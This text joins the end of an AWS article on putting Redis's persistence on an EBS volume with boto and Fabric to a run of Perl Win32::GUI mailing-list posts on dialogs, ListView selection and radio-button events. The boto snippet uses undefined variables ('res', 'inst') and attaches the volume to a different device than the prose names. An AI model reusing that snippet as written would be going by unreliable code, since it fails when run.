do everything in Amazon SimpleDB as well by expanding the SimpleDBBackend: It's up to you. Setting Up Redis on Amazon EBS Redis is an advanced key-value storebetter thought of as a data structure server. Redis excels at use cases that involve many quick operations where it would also be nice to have some persistence. Though it exists as a separate software package, perhaps the best way to deploy it on Amazon EC2 is to have its persistence layer hosted on Amazon EBS. Note: For detailed information on setting up and configuring Redis, see Simon Willison's Redis tutorial. Think of Amazon EBS as a mountable disk partition. The beauty of it is that unlike local Amazon EC2 instance storage, you won't lose the data when the instance is terminated. You can also periodically take snapshots of your Amazon EBS partition and store them on Amazon Simple Storage Service (Amazon S3). So, begin by creating a 10-GB Amazon EBS volume and attaching it to /dev/sdb on your Amazon EC2 instance. You can then mount this volume (under /volume) and start saving data on it: def create_ebs_volume(): c = boto.connect_ec2() reservations = c.get_all_instances() # since we only have one instance this will do instance = res.instances[0] # create EBS volue in the same area where our instance lives volume = c.create_volume(10, inst.placement) print volume.attach(inst.id, '/dev/sdh') def mount_ebs_volue(): sudo('mkdir -p /volume') sudo('mount -t ext3 /dev/sdh /volume') Any time your instance is terminated, the persistent side of Redis will always be available for the next instance you launch. This is especially useful if your Redis instance crashes and needs to be quickly recreated or whether the resources used need to be vertically scaled up to a more powerful instance. Conclusion This article demonstrated how you would work with various datastores on AWS. There's a lot of them to choose from, but each has a potential place in your application stack. Using Boto and Fabric, you saw how you could reuse and save your configuration steps, replaying them in the future. Also, this article showed how a tool like Fabric (combined with Boto) could allow you to manage all your instances on Amazon EC2. Given a Django application, you learned how you can get started using Amazon SimpleDB to implement user accounts. Even using a NoSQL-type datastore like Redis is possible on Amazon EC2, especially when used in conjunction with Amazon EBS. About the Author Reza Lotun lives in London and spends his time architecting and developing the back-end systems for TweetDeck as well as contributing code to Boto. You can follow him on Twitter at @rlotun.
http://aws.amazon.com/articles/Amazon-EC2/3997
CC-MAIN-2015-22
refinedweb
3,546
56.35
You can create classes inside of a module which gives you your own kind of namespace amongst other things Anyone have any tips for best practices on this? When do you put classes inside of a module? What do you use them for? You can create classes inside of a module which gives you your own kind of namespace amongst other things Anyone have any tips for best practices on this? When do you put classes inside of a module? What do you use them for? I don’t do this only because, if you do, you can’t make the module external to the project. Otherwise, for examples of where this is done, see the MacOSLib project, among others. One advantage is that the Module gives you a place to put common properties, constants, and methods that all the embedded classes can use. One advantage of putting a class into a module is that protected and private methods, properties, etc. of the module can be accessed by the class. I went through a phase of doing just this, but like Kem says, it becomes very complicated once you want to have the objects external, not to mention I ran into issues with code editor ‘suggestions’ and enums in classes that are in modules. Usually when I distribute code as free open source to other users. It just makes things easier for users wehn everything is wrapped into one single file that can easily be imported. The feedback request that gets the #1 position in my top cases (and are awarded the most points)… <>… External Module Support. It will be a huge time saver if modules that contains classes can be made external. This one is pretty big for us. I’ve added it to my top cases. Currently #44. One thing I don’t like is you can’t encrypt an entire module. So you can put private methods inside a module but theres no way to guarantee the class doesn’t leave the module. I’d love to support external modules with contents. I’ve actually worked on it several times over the past 5+ years with other engineers starting with Aaron way back when. WIthout spending a week detailing why its so danged hard to do I can just say that it’s a real bugbear to solve. Interesting! More thoughts? I’ve added it to my top cases too. Just today spent a lot of time tried to share a module among few projects. The only way I found - is to use symlinks. if you use svn check into svn sub projects which you can use to do this
https://forum.xojo.com/t/best-practices-classes-inside-of-a-module/12085
CC-MAIN-2022-27
refinedweb
443
80.62
My last article turned out to be a bit of a niche topic, so I decided to try my hand at something a little more mainstream. Though we'll still be discussing Phaser (gotta monopolize that niche!), you don't need to read the previous article to follow along with this one. Today we're going to take a look at how we can implement Spelunky-inspired in Phaser. You can see the finished product in the live demo and you can find the source code over on Github. We'll start by reviewing the effect and learning a bit about scene events and transitions, then jumping in to the implementation. The concept Before we get into the weeds, let's review the effect that we're looking to achieve. If you haven't played Spelunky before (you really should), I've included a video for reference: Each level starts with a completely blank, black screen, which immediate reveals the entire screen using a pinhole transition. The transition doesn't start from the centre of the screen; instead, the transition is positioned on the player's character to centre your attention there. Exit transitions do the same in reverse — fillingthe screen with darkness around the player. Let's dig into how we can replicate this effect. Update Nov 26, 2020 — Here is a preview of the final result: Scene events There are many events built into Phaser triggered during the lifecycle of a Scene that give you a lot of control. For example: if you're a plugin author. you might use the boot event to hook into the boot sequence of a Scene. Or you may want to do some cleanup when your scene is destroyed or put to sleep. For our purposes, we'll be using the create event to know when our level is ready to be played. You can listen to events from within your scene like this: this.events.on('create', fn); I prefer to use the provided namespaced constants: this.events.on(Phaser.Scenes.Events.CREATE_EVENT, fn); Refer to the documentation for more information on Scene events. Scene transitions For this effect, we're going to use Scene transitions, which allow us to smoothly move from one scene to another. We can control exactly how this transition behaves by specifying a configuration object. If you've ever worked with tweens then you'll feel right at home as there are similarities between them. Transitions can be started by invoking the Scene plugin: this.scene.transition({ // Configuration options }); Similar to Scene events, there are corresponding events for the transition lifecycle. These events can be subscribed to directly on the scene. We'll be using the out event to know when a transition is taking place. this.events.on(Phaser.Scenes.Events.TRANSITION_OUT, fn); The arguments for transition event handlers subtly change from event to event. Refer to the documentation for details. Putting it all together The first step is to create an empty base class. It is not strictly necessary to create a separate class but doing so will help isolate the code and make reusing it across levels easier. For now, just extend this bare scene; we'll flesh it out as we go along. class SceneTransition extends Phaser.Scene { // TODO } class LevelScene extends SceneTransition {} All your base Now that we have our classes in place, we can begin filling them out. Start by using the Graphics object to create a circle and centre it in the scene. The circle should be as large as possible while still being contained within the scene, otherwise the graphic will be cropped later on. This also helps minimize artifacts from appearing along the edges during scaling. const maskShape = new Phaser.Geom.Circle( this.sys.game.config.width / 2, this.sys.game.config.height / 2, this.sys.game.config.height / 2 ); const maskGfx = this.add.graphics() .setDefaultStyles({ fillStyle: { color: 0xffffff, } }) .fillCircleShape(maskShape) ; You should end up with the following: Next we're going to convert the mask graphic to a texture and add that to the scene as an image. We don't want the mask graphic itself to be visible in the final result, so make sure to remove the fill. // ... const maskGfx = this.add.graphics() .fillCircleShape(maskShape) .generateTexture('mask') ; this.mask = this.add.image(0, 0, 'mask') .setPosition( this.sys.game.config.width / 2, this.sys.game.config.height / 2, ) ; You should now be back to a blank scene. Finally, we apply the mask to the camera. this.cameras.main.setMask( new Phaser.Display.Masks.BitmapMask(this, this.mask) ); Creating the level We're not going to spend much time setting up the level itself. The only requirement is that you extend the base class we created and include a key. Get creative! import SceneTransition from './SceneTransition'; export default class LevelOne extends SceneTransition { constructor () { super({ key: 'ONE', }); } preload () { this.load.image('background_one', ''); } create() { super.create(); this.add.image(0, 0, 'background_one') .setOrigin(0, 0) .setDisplaySize( this.sys.game.config.width, this.sys.game.config.height ) ; } } You should now see something similar to this: Setting up the events Returning to the base class, we need to record two values. The first will be the minimum scale that the mask will be; the second is the maximum. const MASK_MIN_SCALE = 0; const MASK_MAX_SCALE = 2; The minimum value is fairly straightforward: to create a seamless transition, we need the mask to shrink completely. The maximum is a little more tricky and will depend on the aspect ratio of your game and what shape you use for your mask. Play around with this value until you're confident it does the job. In my case, my mask needs to be twice its initial scale to completely clear the outside of the scene. Next we can (finally) leverage those events from earlier. When a transition is started, we want to animate the mask from its maximum scale to its minimum. It would also be a nice touch to have the action paused to prevent enemies from attacking the player, so let's add that in. this.events.on(Phaser.Scenes.Events.TRANSITION_OUT, () => { this.scene.pause(); const propertyConfig = { ease: 'Expo.easeInOut', from: MASK_MAX_SCALE, start: MASK_MAX_SCALE, to: MASK_MIN_SCALE, }; this.tweens.add({ duration: 2500, scaleX: propertyConfig, scaleY: propertyConfig, targets: this.mask, }); }); Once the next scene is ready we want to run the animation in reverse to complete the loop. There are a few changes between this animation and the last that are worth discussing, primarily around timing. The first change is the duration of the animation; it has been roughly halved in order to get the player back into the action faster. You may have also noticed the addition of the delay property. In my testing, I found that the animation can look a bit off if it reverses too quickly. So a small pause has been added to create a sense of anticipation. this.events.on(Phaser.Scenes.Events.CREATE, () => { const propertyConfig = { ease: 'Expo.easeInOut', from: MASK_MIN_SCALE, start: MASK_MIN_SCALE, to: MASK_MAX_SCALE, }; this.tweens.add({ delay: 2750, duration: 1500, scaleX: propertyConfig, scaleY: propertyConfig, targets: this.mask, }); }); Triggering a transition So far we have very little to show for all of this setup that we've done. Let's add a trigger to start a transition. Here we're using a pointer event in our level but this could be triggered by anything in your game (e.g., collision with a tile, the result of a timer counting down, etc.). this.input.on('pointerdown', () => { this.scene.transition({ duration: 2500, target: 'ONE', }); }); If you tried to trigger the transition, you may have noticed that nothing happens. This is because you cannot transition to a scene from itself. For the sake of this example, you can duplicate your level (be sure to give it a unique key) and then transition to that. And that's it! You should now have your very own Spelunky-inspired level transition. Conclusion Level transitions are a great way to add a level of immersion and polish to your game that doesn't take a whole lot of effort. Since the effect is entirely created by applying a mask to the Camera, it could easily be modified to use, say, Mario's head to replicate the effect found in New Super Mario Bros. Or if you're feeling more adventurous (and less copyright-infringy) you could create a wholly unique sequence with subtle animation flourishes. The only limit really is your imagination. Thank you for taking the time to join me on this adventure! I've been having a lot of fun working on these articles and I hope they come in handy for someone. If you end up using this technique in one of your games or just want to let me know what you think, leave a comment here or hit me up on Twitter. Discussion (4) Beautiful, thanks for sharing! Thanks, Juan! Glad you enjoyed it. Do you have a gif of the final result? I've added a gif to the beginning of the post :) Thanks for reading!
https://practicaldev-herokuapp-com.global.ssl.fastly.net/jorbascrumps/creating-spelunky-style-level-transitions-in-phaser-2ajd
CC-MAIN-2021-17
refinedweb
1,509
65.42
One of the best optimizations we can make when adopting cloud and serverless technologies is to take advantage of asynchronous processing. Services like EventBridge, Step Functions, SNS and SQS can form the backbone of highly scalable, reliable, cost-effective and performant job processing. Cloud services like these mean we no longer have to worry about a single process going out of memory or a spike in traffic causing critical business functions to fail when we need them most. Adopting asynchronous architectures introduces new challenges around test automation. Nearly all automation testing is built around the idea of call and response synchronous processing. We call the web server and test the html string returned. We POST to the /widgets endpoint, receive a 200 OK response and then can GET our new widget. Tools like Selenium and Cypress aren't suited to workflows that involve asynchronous background processing. At best, you can fire an event and then poll for the eventual desired result. While the idea of testing frameworks for asynchronous processing hasn't really hit the mainstream, there are some great articles out there. I highly recommend following the work of Sarah Hamilton and Paul Swail and their approaches to solving this problem using libraries like aws-testing-library and sls-test-tools. These approaches share some of the same drawbacks: - They rely on an external credential or key to access the AWS account in question. - They require a wait or sleep step to allow AWS time to process the asynchronous event. - There's no real CI/CD integration happening. A failing test won't cause a deployment to roll back. Read enough already? Check out my source code. Table of Contents - External Credentials - Don't Sleep - Automatic Rollback - Custom Resource Provider Framework for Test - Payment Collections App - Test Event - Complete Event - Provider - Test Run - Bonus: EventBridgeWebSocket - Infrastructure Testing - Next Steps External Credentials When writing tests using something like aws-testing-library or sls-test-tools, we must have credentials to an AWS account that at least lets us send a few events and subscribe to or query the results in order to perform assertions. Depending on the stance of our organization about cloud access, this could be completely fine or it could be a never-gonna-happen dealbreaker. Often this kind of approach will be OK for a development environment, but it could be unlikely to fly in production. We may be restricted to running such tests in a CI/CD pipeline. That could get us past a security review, but it might also slow the feedback loop of writing tests, resulting in fewer overall tests written. The safest way to solve this problem is to remove external access from the equation. If we run our tests from a resource within the AWS account, such as a Lambda function, then while we still need normal IAM permissions, we don't need to create any additional external roles. Tests can be run in production without violating the least privilege principle of giving our deployment role the minimum grants required to create the resources we need. Don't Sleep Sleep or wait statements are the bane of test automation. When a test fails, can we "fix" it by increasing the timeout? Does doing so reflect the normal operation of using cloud or have we introduced some instability to our system that is now being normalized by making the tests take longer? In the end, we have to pin our sleep statement to the longest our process can possibly take or decide to be tolerant of test failures. We can mitigate this problem by using polling instead of sleep. To be fair, the solutions given by Sarah and Paul don't preclude polling, but you are on your own to implement it. Automatic Rollback Once we have a really good automation suite, we should wish to connect it to our CI/CD process such that if the tests fail, we roll back the deployment. Assuming we are using AWS and CloudFormation, the only lever we really have to pull there is to attach an alarm to a test suite. This could be achieved by having the test publish custom metrics that trigger the alarm and a potential rollback. This would be yet another permission needed to our test runner role and isn't something natively supported by any testing library. Custom Resource Provider Framework for Test This is not the first time I've written about Provider Framework. I think the CDK implementation of CloudFormation Custom Resources is one of the coolest things I've come across recently. I'm constantly impressed by the things I can do with it. Let's examine how it solves some of the problems I've outlined above. Our tests will be executed by Lambda functions instead of via some external tool. These functions will still need normal IAM roles to access the resources needed to perform the test, but the functions themselves are not accessible to any resource or role external from the account. This means we can run tests in production without risking any data exposure. We get built-in polling in the isComplete step. This is a Lambda function that can be executed at queryInterval that can perform some sort of assertion and then return a boolean value indicating whether the test is complete or we should continue polling. Provider Framework also has built-in error-handling. Throwing any error will pass a "FAILED" response to CloudFormation, which in turn will trigger a rollback. These advantages are balanced by there not being a good assertion library ready to use in a Lambda function and by the potential for a poor developer experience if we find ourselves debugging the custom resource itself and having to perform frequent deployments to write a test. I think those problems can be solved with some additional tooling, but nothing exists to date. Payment Collections App So let's see a test in action. The design of this application is that we receive an asynchronous notification from our payment provider indicating whether or not a payment was successful. If the payment was successful, we update our database to indicate that. Otherwise we trigger a collections workflow. Payment events (success or failure) come to us via EventBridge. Our Collections workflow is managed by Step Functions. The record of payment and current status is stored in DynamoDB. The scenarios we'd like to test are: - Receive a successful payment event and record it in our table. - Receive a failed payment event and kick off the collections workflow, run the collection, and record the eventual result in our table. Test Event To write the test we start with a Lambda function that will initiate the events we want to test. In this case, we're going to send two events to our event bus. Here is a TypeScript function that will do exactly that. import EventBridge from 'aws-sdk/clients/eventbridge'; import type { CloudFormationCustomResourceEvent } from 'aws-lambda'; const eb = new EventBridge(); export const handler = async (event: CloudFormationCustomResourceEvent): Promise<void> => { if (event.RequestType === 'Delete') { return; } try { const { Version } = event.ResourceProperties; const events = ['success', 'failure'].map((status) => eb .putEvents({ Entries: [ { EventBusName: process.env.BUS_NAME, Source: 'payments', DetailType: status, Time: new Date(), Detail: JSON.stringify({ id: `${Version}-${status}` }), }, ], }) .promise(), ); await Promise.all(events); } catch (e) { console.error(e); throw new Error('Integration Test failed!'); } }; We're able to take advantage of the CloudFormationCustomResourceEvent type from the @types/aws-lambda package. Because Custom Resources support the full lifecycle of CloudFormation, we need to evaluate "Delete" as a no-op. We don't want the test to run if the stack is being deleted, as it would obviously fail since the necessary resources won't exist. The rest of the function simply uses putEvents to propagate two test events, a success and a failure. Note that we are pulling the Version from the Custom Resource and passing that as the event detail. Complete Event The complete event will be called at the interval specified in our code (defaulting to 5 seconds) until it returns a positive result, throws an error or totalTimeout (default 30 minutes and max of two hours) elapses. As before, if this is a stack deletion event, we want the test to just pass as our business logic shouldn't be under test. If we're undergoing a create or update event, then we'll want to query the database to see if the job is finished yet. We are using the same Version from the original Custom Resource to make sure we can query the same item in the table. import { CloudFormationCustomResourceEvent } from 'aws-lambda'; import { PaymentEntity, PaymentStatus } from '../models/payment'; export const handler = async ( event: CloudFormationCustomResourceEvent, ): Promise<{ Data?: { Result: string }; IsComplete: boolean }> => { if (event.RequestType === 'Delete') { return { IsComplete: true }; } const { Version } = event.ResourceProperties; try { // Query the DynamoDB table to get the meta record. If it has some processed records // and the processed count is equal to validated count, the test passes. const successResponse = (await PaymentEntity.get({ id: `${Version}-success` })).Item || {}; const failureResponse = (await PaymentEntity.get({ id: `${Version}-failure` })).Item || {}; console.log('Success Response: ', successResponse.status); console.log('Failure Response: ', failureResponse.status); const IsComplete = successResponse.status === PaymentStatus.SUCCESS && [PaymentStatus.COLLECTION_FAILURE, PaymentStatus.COLLECTION_SUCCESS].includes(failureResponse.status); return IsComplete ? { Data: { Result: `Payment ${Version}-success finished with status ${successResponse.status} and payment ${Version}-failure finished with status ${failureResponse.status}`, }, IsComplete, } : { IsComplete }; } catch (e) { console.error(e); throw e; } }; This function must return an object with IsComplete and a boolean value. If IsComplete is true, then it may also include a Data attribute with a JSON payload. In this case I've defined that as { Result: string }. My intent is to print that string in the console to provide some detail on the test. Note that we lack the convenience of a nice assertion library, but this example is simple enough to get by with imperative code. Provider We need to write a little CDK code to make all this work. In this case, I wrote the entire integration test as a nested stack, which gives it a nice isolation from the actual application. In addition to just organizing our code an potentially avoiding stack limits, this also lets us hedge our best a little by making it easy to disable the nested stack in the event of a test failure blocking a critical deployment. The stack creates the functions and grants necessary permissions to put events to EventBridge and query DynamoDB. Over the course of the test, we'll see a few events come across EventBridge and also trigger Step Functions. Tests to trigger other asynchronous workflows using SNS or SQS can be done in a similar fashion. Adding the functions to Provider Framework only takes a few lines of code. const intTestProvider = new Provider(stack, 'IntTestProvider', { isCompleteHandler, logRetention: RetentionDays.ONE_DAY, onEventHandler, totalTimeout: Duration.minutes(1), }); this.testResource = new CustomResource(stack, 'IntTestResource', { properties: { Version: new Date().getTime().toString() }, serviceToken: intTestProvider.serviceToken, }); We pass in our two handlers to the Provider construct, then create a CustomResource that uses the service token from the Provider. We are also establishing that Version property which will be the current timestamp in milliseconds as a string. This can serve as a unique key, assuming two tests don't kick off in the same millisecond. If we think that might happen, then using some kind of uuid generator would be more appropriate. It's important that we include some kind of unique value here because if we don't then update events will not detect any change and will not run our test! Setting some kind of unique value here is critical. Finally the testResource is stored as a member of the IntegrationTestStack so that we can access the output and print it to the console from the main stack. new CfnOutput(this, 'IntTestResult', { value: intTestStack.testResource.getAttString('Result') }); Test Run With all that done, we can now deploy our application as normal, whether that's a cdk deploy from our laptop or something more sophisticated like a CI/CD pipeline. Outputs: payments-app-stack.IntTestResult = Payment 1631477097557-success finished with status SUCCESS and payment 1631477097557-failure finished with status COLLECTION_FAILURE We can check out the visualization of a few step function runs. Bonus: EventBridgeWebSocket I didn't want to pass up the advantage to give a quick look to David Boyne's EventBridgeWebSocket construct. With just a few lines of code, I'm able to actively monitor EventBridge traffic while my test runs! new EventBridgeWebSocket(stack, 'sockets', { bus: eventBus.eventBusName, eventPattern: { source: ['payments'], }, stage: 'dev', }); There's really nothing to this. I just have to provide the bus name and an optional pattern. Now using websocat, I get output like this: % websocat wss://MY_API_ID.execute-api.us-east-1.amazonaws.com/dev {"version":"0","id":"e8d8989a-c870-85b2-9f56-aa7867701eae","detail-type":"success","source":"payments","account":"MY_ACCOUNT_ID","time":"2021-09-12T20:22:03Z","region":"us-east-1","resources":[],"detail":{"id":"1631478043585-success"}} {"version":"0","id":"34f6d36b-0cda-65e2-9851-194a9c1be01d","detail-type":"failure","source":"payments","account":"MY_ACCOUNT_ID","time":"2021-09-12T20:22:04Z","region":"us-east-1","resources":[],"detail":{"id":"1631478043585-failure"}} {"version":"0","id":"8444d579-c553-4c91-e07a-9de3f9cc17c0","detail-type":"collections","source":"payments","account":"MY_ACCOUNT_ID","time":"2021-09-12T20:22:06Z","region":"us-east-1","resources":[],"detail":{"id":"1631478043585-failure"}} This isn't explicitly a testing tool of course, but can be of great help when debugging issues and the cost of entry is amazingly low. Just make sure you don't implement this in production, at least without adding an authorizer to the WebSocketApi. Infrastructure Testing Now that we've established Provider Framework as a good basis for testing, are there other applications? Yes! Instead of writing a test against our application, we could use aws-sdk to perform assertions against our infrastructure. This has the same advantages outlined above: - We don't need external keys to perform these assertions. - Using addDependencycan guarantee the test only runs after the resources are created or updated. - If the test fails, the deployment will automatically roll back. It's worth mentioning that AWS CDK already has an RFC for integration testing so we might end up with something even better. In the meantime, if you are serious about integration testing, time to give AWS CDK and Provider Framework a look! Next Steps The weakness of this approach is the imperative coding and lack of convenience methods exposed by libraries like aws-testing-library and sls-test-tools offer. It definitely feels a lot more ergonomic to write expect({...}).toHaveLog(expectedLog) than to query a database and try to test properties on the returned item. I'm not sure if a library like jest is really suited to running in Lambda, but there's definitely room for innovation on a better assertion engine here. That said, I think this approach is strong enough on its own. I've been using just such a test for about three months now and find it to be very reliable and a good way to guarantee quality delivery. Discussion (3) [[Pingback]] This article was curated as a part of 25th Issue of Software Testing Notes Newsletter. Thanks Pritesh! Looks like you've got lots of great content. I think you'll get some new subscribers when I share with my colleagues. hey Matt, thank you for the shoutout.
https://dev.to/aws-builders/testing-the-async-cloud-with-aws-cdk-33aj
CC-MAIN-2021-49
refinedweb
2,561
55.24
Django tags with parameters In the beginning Some time ago, I struggled and wrestled with a problem that should have been easy. How, in my custom tag, can I parse the parameters passed to me, and know if they're string/int literals, or things I should look up in context? Now, way back in my Zope days, I had this one beat... I had a little pattern I used... and used ... and used... but that was 10 years ago, and a whole different mindset. I hunted about, and finally found someone else had "done it right!™" in their Django app, so I copied them. Then I put it in my own toolbox gnocchi-tools. Recently I was trying to help someone who'd run into this exact problem. "Oh", I thought, "I've got this solved!" But it wasn't that easy (because I hadn't written sufficient docs -- mea culpa). So, here's a reference for everyone. How It's Done Everything you need is already in Django. Imagine that :) Building First, during parsing, when your tag function is handed everything and expected to yield a Node, you have to split the contents of the {% %}. def mytag(parser, token): parts = token.split_contents() parts.pop(0) Remember that the first 'part' is your tag name. I typically discard this (hence the pop). Next, you ask the parser to build a 'filter' for each parameter. parts = [ parser.compile_filter(part) for part in parts ] Obviously, not every tag is going to want every parameter resolvable ... but it'll suffice for this example. That's it for the prep work... pass these values to your tag, and the rest happens in your tag render function. return MyTag(parts) Rendering In your render function, you now need to resolve these filters "in context". class MyTag(template.Node): def __init__(self, parts): super(MyTag, self).__init__() self.parts = parts def render(self, context): parts = [ part.resolve(context) for part in parts ] ... and that's it! All of your 'parts' are now resolved and ready to use!
http://musings.tinbrain.net/blog/2011/feb/25/django-tags-parameters/
CC-MAIN-2018-22
refinedweb
342
77.03
26/09/2007, a9876543210@... <a9876543210@...> wrote: > I've the problem that my labels are only shown after clicking on them > or after resizing the window. > do I have to implement a repainting or something? No, but you have to process the event queue somewhere in your code. You example is incomplete, and does not show whether/where you ever call Dialog()/DoEvent()/DoModal(). I suggest you read this if you haven't already: Regards, Rob. > > my script: > > [snip] > $cfg_window=Win32::GUI::Window->new( > -name => "configwin", > -title => "$cfg{name} - Configuration", > -left => CW_USEDEFAULT, > -size => [ 600, 450 ], > -parent => $main, > -vscroll => 1, > -hscroll => 1, > -helpbutton => 0, > -dialogui => 1, > -resizable => 1, > -onTerminate => sub { do_animation($cfg_window); 0; }, > ); > > my $ncw = $cfg_window->ScaleWidth(); > my $nch = 20; > > $cfg_window->AddButton( > -name => "CFGOK", > -text => "OK", > -pos => [ 30, $nch ], > ); > $cfg_window->AddButton( > -name => "CFGCANCEL", > -text => "CANCEL", > -pos => [ 70, $nch ], > ); > > my $count = 0; > my $padding = 10; > > $cfg_window->AddGroupbox( > -name => "CFGX", > -title => "Configuration", > -left => 25, > -top => 10, > -width => 400, > -group => 1, > ); > > foreach my $xx (sort(keys %config)) > { > $count = $count + 1; > $cfg_window->AddTextfield( > -name => "${xx}_name", > -text => "$config{$xx}", > -left => 35, > -prompt => [ "$xx:" , 150 ], > -height => 20, > -width => 200, > -top => 25 + ($count * 20), > -width => $cfg_window->CFGX->Width() - (2 * 20), > -tabstop => 1, > ); > } > > $cfg_window->CFGX->Height(350); > $cfg_window->CFGX->Width(550); > > do_animation($cfg_window); > $cfg_window->SetRedraw(1); > > [/snip] > > thx > juergen > > -- > 2005. > > _______________________________________________ > Perl-Win32-GUI-Users mailing list > Perl-Win32-GUI-Users@... > > > -- Please update your address book with my new email address: rob@... On 26/09/2007, a9876543210@... <a9876543210@...> wrote: > I want to make an input with a dialogbox. > but I've the problem that the program continues while the dialogbox is > open. > > how can i make the script waiting for closing the dialogbox? As you haven't posted a *short* and *complete* example of what you are trying to do, I can't really understand what it is that you are asking. I *suspect* that you want something like $filenameDlg->DoModal(); after your line $filenameDlg->Show(); I can't be more exact without a complete script to modify. The tutorial in the documents covers this. regards, Rob. > > thx > juergen > > > my script: > [snip] > do_something... > ask_filename(); > do_the_rest... > > sub ask_filename { > # Create Find DialogBox > my $filenameDlg =3D new Win32::GUI::DialogBox( > -name =3D> "FileDlg", > -title =3D> "Filename", > -pos =3D> [ 150, 150 ], > -size =3D> [ 360, 115 ], > ); > > # Filename > $filenameDlg->AddTextfield ( > -name =3D> "FileDlg_Text", > -pos =3D> [10, 12], > -size =3D> [220, 21], > -prompt =3D> [ "Filename: ", 45], > -tabstop =3D> 1, > ); > > $filenameDlg->AddButton ( > -name =3D> "FileDlg_OK", > -text =3D> "&OK", > -pos =3D> [270, 10], > -size =3D> [75 , 21], > -onClick =3D> sub { $filenameDlg->Hide(); $filename=3D$f= ilenameDlg->FileDlg_Text->Text; return 0; }, > -group =3D> 1, > -tabstop =3D> 1, > ); > > # Cancel Button > $filenameDlg->AddButton ( > -name =3D> "FileDlg_Cancel", > -text =3D> "C&ancel", > -pos =3D> [270, 40], > -size =3D> [75 , 21], > -onClick =3D> sub { $filenameDlg->Hide(); 0; }, > -tabstop =3D> 1, > ); > $filenameDlg->FileDlg_Text->SetFocus(); > $filenameDlg->Show(); > return 0; > } > [/snip] > -- > Psssst! Schon vom neuen GMX MultiMessenger geh=F6rt? > Der kanns mit allen: > > ------------------------------------------------------------------------- > This SF.net email is sponsored by: Microsoft > Defy all challenges. Microsoft(R) Visual Studio 2005. > > _______________________________________________ > Perl-Win32-GUI-Users mailing list > Perl-Win32-GUI-Users@... > > > --=20 Please update your address book with my new email address: rob@... On 19/09/2007, Brian Rowlands (Greymouth High School) <RowlandsB@...> wrote: > I've used TheLoft to create a gui interface for a program I'm writing. A > button I click is meant to read a selected line from a listview pane and > display the results in a selection of tf / cb controls: > > # determine which rows have been selected > my @selection = $win-> lvwFleece-> SelectedItems(); > > 1. @selection contains the index values of the rows selected. However, > if no rows are selected I was expecting it to be return a () array but > printing its size in such a case shows a value of 1. Why would that be? Bug, in my opinion. There is similar behaviour throughout the XS code where the return value from subs that are expected to return lists is incorrect for there being no values - the subs return undef rather than the empty list. You'll find the one item in the list is undef. I'm fixing them as I find them, despite the change being non-backwards compatible, as it's very useful to be able to write: # process all selected items for ($win->SelectedItems()) { process_item($_); } rather than what you have to do now: # process all selected items for ($win->SelectedItems()) { next if not defined $_; process_item($_); } or some equivalent. So long as code handles both empty lists and the undefined value case, then there is no backwards-compatibility issue. Backwards compatibility issues may occur with any code that assumes the list has at least one entry and check the first value in the list for definedness. > 2. I really need some better way to determine if the listview has been > clicked. The event ItemClick(ITEM) in the package description for > listview looks as though it could be a better option for me. Can > someone kindly help me to construct the line to determine if the > listview has had a line selected please? I'm still learning perl and > I'm puzzled how to do this simple task. Does this help? #!perl -w use strict; use warnings; use Win32::GUI qw(); my $mw = Win32::GUI::Window->new( -title => "ListView - Report Mode", -size => [400,300], ); $mw->AddListView( -name => "LV", -width => $mw->ScaleWidth(), -height => $mw->ScaleHeight(), -report => 1, -singlesel => 1, -onItemClick => \&itemSelected, ); for my $col_name ("Title", "Card Number", "Shelf Location") { $mw->LV->InsertColumn( -text => $col_name, -width => 100, ); } $mw->LV->InsertItem( -text => [ "Green Eggs and Ham", "JF SEU", "Children's", ], ); $mw->LV->InsertItem( -text => [ "A Brief History of the Universe", "897.112", "2nd Floor", ], ); $mw->LV->InsertItem( -text => [ "Your Book Title Here", "501.2", "Vault", ], ); $mw->Show(); Win32::GUI::Dialog(); exit(0); sub itemSelected { my ($self, $item) = @_; my %info = $self->GetItem($item); print qq(Selected: "$info{-text}"\n); return 1; } __END__ Regards, Rob. On 06/09/2007, Veli-Pekka T=E4til=E4 <vtatila@...> wrote: > Hi list, > I think I might have found a bug in the event handling of Radio Buttons, > or else have just somehow misunderstood how their event handling works. > EIther way, I'd appreciate any comments and clarifications. > > Issue: > > if I create two radio buttons in a dialog, set them up in the tab order, > and then use the arrows to select one of the buttons, the onClick event > is fired twice when the arrows are used to select another radio button. > In contrast, if I use the mouse or click the button programmatically, > the event is fired only once. I would have expected the latter behavior > in keyboard usage, too. What causes the refiring of the onClick event? I, too, was surprised by this behaviour, but it appears to be 'standard' windows behaviour for radio buttons. I can't really explain it, but will describe what I see using Spy++: Using the mouse: - Mouse down sets the focus to the button and set the highlight state. - Mouse up unsets the highlight state and send a BN_CLICKED message to the parent Using the keyboard: - key down causes IsDialogMessage to move the focus to the new button (which generates a BN_CLICKED message) - key up causes IsDialogMessage to send a BN_CLICK message to the button, which in turn causes the button to send itself WM_LBUTTONDOWN and WM_LBUTTONUP messages (which generates the sequence of events for the mouse click, which in turn generates the second BN_CLICKED As I say, I don't really understand the complexity of the message generation, but I am convinced that this is a windows thing and not a Win32::GUI bug. Your click handler needs to cope with multiple clicks anyway, as I can set there and click the same button again and again .... Regards, Rob. > > version info: > > This is perl, v5.8.8 built for MSWin32-x86-multi-thread > Documentation for Win32::GUI v1.05 created 05 Nov 2006 > > Sample code: > > use strict; use warnings; > use Win32::GUI qw||; use Win32::GUI::GridLayout; > > my($width, $height) =3D qw|4 4|; > my $win =3D Win32::GUI::DialogBox->new > ( > -name =3D> 'win', -size =3D> [40 * $width, 40 * $height], > -text =3D> 'radios' -onTerminate =3D> sub { -1 }, > ); > > my $grid =3D Win32::GUI::GridLayout->apply > ( > $win, $width, $height, > 0, 0 > ); > > my @buttons; > for my $i (1 .. $width) > { # Ad some radio buttons. > my $radio =3D Win32::GUI::RadioButton->new > ( > $win, -name =3D> "b$i", -tabstop =3D> 1 , -text =3D> $i, > -onClick =3D> sub > { > print "Click ", (shift)->UserData() . "\n"; > 1 > } > ); > $radio->UserData($i); > $grid->add($radio, $i, $height / 2); > push @buttons, $radio; > } # for > my $first =3D $buttons[0]; > $first->SetFocus(); > $first->Click(); > $grid->recalc(); > $win->Show(); > Win32::GUI::Dialog(); > > -- > With kind regards Veli-Pekka T=E4til=E4 (vtatila@...) > Accessibility, game music, synthesizers and programming: > > > ------------------------------------------------------------------------- > This SF.net email is sponsored by: Splunk Inc. > Still grepping through log files to find problems? Stop. > Now Search log events and configuration files using AJAX and a browser. > Download your FREE copy of Splunk now >> > _______________________________________________ > Perl-Win32-GUI-Users mailing list > Perl-Win32-GUI-Users@... > > > --=20 Please update your address book with my new email address: rob@... On 06/09/2007, 